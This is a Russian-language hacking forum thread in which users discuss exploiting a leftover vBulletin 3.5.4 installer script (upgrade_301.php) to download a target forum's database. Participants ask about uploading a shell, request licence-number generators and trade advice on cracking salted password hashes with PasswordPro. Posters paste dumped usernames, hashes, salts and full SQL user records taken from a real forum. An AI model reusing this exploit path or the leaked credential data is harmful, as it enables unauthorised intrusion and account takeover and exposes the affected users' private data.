Короче, нашел форум где стоит булка версии 3.5.4. Админ когда форум ставил не почитстил install. Т.е. пример: http://target.ru/forum/install/upgrade_301.php?step=SomeWord Заходишь значит на критическое обнавление и мона скачать там базы sql. Вот меня интересует, может там можно не только скачивать а и залить ну шелл например =) Кстати на счёт таких ответов типа "качай users.sql там будут хэшники и декодируй и с помощю проги passwordpro" таких ответов не надо. По существу пожалуйста...
Там же нету функций на восстановление бд, имхо нельзя. Чем не нравиться вариант с хэшем и солью? Обленился народ, шелл им сразу подавай.
Долго это брутом заниматся... =( Темболее у админа какой нибудь пароль из 8-10 символов. Причём Верхний регистр и нижний +символы. И попробуй подобрать пасс =) У меня PasswordPro пишет что осталось всего лишь 10867 дней =) Проще будет XXSку тогда найти =)
ну вон же четвёртый с конца : nameass:salt test:88daac6bba8e542226b399d6fd6d5034:+P[ driver:cf95d7cc88708edb51abda56c5e73877:BqT taranvv:bdf68936f076f2f440615cc60e4cbbaa:xk| ruslan11:9a67b99a6b7e698531e260a655317dc0:SE\\
Я понял, спасибо. PasswordPro и вперёд. Один только вопрос - где можно качнуть нормальный словарь для перебора?
При заходе на http://site/forum/install/upgrade_301.php?step=hello Пишет Please Enter Your Customer Number //поле для ввода This is the number with which you log in to the vBulletin.com Members' Area Где можно узнать этот номер? Или дайте пару валидных примеров номеров или генератор plz
Пробуй так Пробуй ссылку http://target.com/forum_path/install/upgrade_301.php?step=SomeWord У меня все получилось
Такая надпись появляется, если форум лицензионный. Нужно вводить регистрационный код форума. Когда форум зануленный, такой надписи нет.
в Vbulletin 3.5.4 воспользовался багой upgrade_301.php, снял дамп всех баз данных форума...Там было зарегино окола 60 юзеров.. я расшифровал больше половины паролей.. но затем наткнулся на следущие строчки в базе... HTML: INSERT INTO user VALUES('35','2','','0','vasya','46ba51cfaa62730ff639deeb40cf9307','2006-09-19','[email protected]','0','','','','','','','','1','0','Новичок','0','1158679407','0','1159311941','1159828322','1159828309','1','10','5','2','1','0','0','0','3783','','0000-00-00','-1','1','10.10.2.16','0','0','0','0','-1','0','0','\'aD'); INSERT INTO user VALUES('67','2','','0','jon','151b39dbb6ec6bce57b7913dbac76e62','2006-10-03','[email protected]','0','','','','','','','','1','0','Новичок','0','1159848049','0','1159848049','1159848255','0','0','10','5','2','1','0','0','0','3143','','0000-00-00','-1','-1','10.10.2.99','0','1','0','0','-1','0','0','\">#'); INSERT INTO user VALUES('63','2','','0','Marina','c19808794095218b7e8e61b99cd02c3a','2006-10-02','[email protected]','0','','','','','','','','1','0','Новичок','0','1159816716','0','1159816716','1159817189','0','0','10','5','2','1','0','0','0','3271','','0000-00-00','-1','-1','10.10.8.67','0','1','0','0','-1','0','0','\\LM'); INSERT INTO user VALUES('26','2','','0','dimom','346a5ee3fb557b5dc4a2b1f1866f3c7b','2006-09-18','[email protected]','0','','','','','','','','1','0','Новичок','0','1158603259','0','1158603687','1159811676','0','0','10','5','2','1','0','0','0','3271','','0000-00-00','-1','-1','10.10.3.33','0','1','0','0','-1','0','0',')*V'); у юзера vasya стоит '\'aD', вот тут я и непонял, соль в Vbulletin 3.5.4 вроде состоит из 3 символов: salt char(3) NOT NULL... и у остальных трёх юзеров соль состоит из 4 символов.. ..подскажите кто может в 4 строчках - где тут соль...
Символ "\" добавляется для того чтобы следующий за ним символ не мог нарушить работу скрипта. Символ ' это может. Поэтому там слэш. Если бы было иначе - скрипт бы обрабатывался так: salt '\' Отмодерьте кто нить пост https://forum.antichat.ru/showpost.php?p=192363&postcount=9 а то топик на 5км по горизонтали прокручивать приходиться.